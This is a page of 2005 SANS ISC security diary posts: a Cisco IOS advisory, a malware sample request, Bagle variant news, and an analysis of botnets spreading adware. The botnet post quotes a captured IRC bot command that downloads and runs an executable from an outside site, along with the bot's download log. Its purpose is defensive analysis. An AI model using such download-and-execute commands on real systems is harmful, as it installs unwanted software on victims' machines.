Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Cisco IOS Security Advisory

Published: 2005-11-03
Last Updated: 2005-11-03 20:45:14 UTC
by Pedro Bueno (Version: 2)
0 comment(s)

Today Cisco released an advisory regarding IOS Head-based Overflow Vulnerability in System Timers. It can be found here. Some users wrote to us asking about rush to upgrade the routers. In the words of one of our handlers, a brief explanation is that "this is related to the ipv6 vulnerability that cisco released patches for midyear AND the mike lynn black hat breifing which exploited that vulnerability and a timer vulnerability."
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (pbueno //%// isc. sans. org)
Keywords:
0 comment(s)

Sample needed - of Spybot.ZIF, which scans for vulnerable Cisco Routers

Published: 2005-11-02
Last Updated: 2005-11-02 20:40:02 UTC
by Patrick Nolan (Version: 3)
0 comment(s)
According to Symantec, W32.Spybot.ZIF "allows a remote attacker" to, among other things, "Scan a specified network range for Cisco routers that may have vulnerable Telnet or HTTP servers running and report results back to IRC."

If anyone catches a sample of this one please upload it through our contact page. Thanks!

Thanks to Jakob S for sending us the sample.

It's MD5 sum is:

2ec1fa5fca52b9c36bddea3511178882  svcdata.exe

so if you have a different sample let us know.
For what it's worth, Symantec detects this as W32.Spybot.ZIF while Kaspersky detects it as Backdoor.Win32.Rbot.adf.
Keywords:
0 comment(s)

Malware Analysis Quiz IV

Published: 2005-11-02
Last Updated: 2005-11-02 14:46:48 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
For those following my quizes, today I posted the answers for the Part III and posted the new one as well...:)
If you missed the previous ones, it is still time to start...!:)
Check it here!
------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
Keywords:
0 comment(s)

6 bagle versions in 1 day

Published: 2005-11-02
Last Updated: 2005-11-02 13:23:08 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
According to viruslist.com
:"The Bagles are continuing to come in. We've detected 6 new variants so far, and just released an urgent update. The first 2 - 3 variants were agressively spammed. The others have been placed on sites and will be downloaded to victim machines. It's the latest move to keep the botnet up and running."

So, check your virus def and try to get the newest one asap.
--------------------------------------------------------------
Handler On Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
Keywords:
0 comment(s)

Botnets and Adwares-Spywares connection

Published: 2005-11-02
Last Updated: 2005-11-02 12:47:14 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of the botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud , is to spread malware, right? Ok (again), today I would like to show you how the botnets are also spreading adware/spyware softwares. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1

This instruction told to my bot to download the ysb.exe 'software' to my computer and open it, as the next messages can show:

#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as it downloaded it oppened it, this window came up:



This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but always nice to know how these things suddenly appears in your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno




Keywords:
0 comment(s)
Diary Archives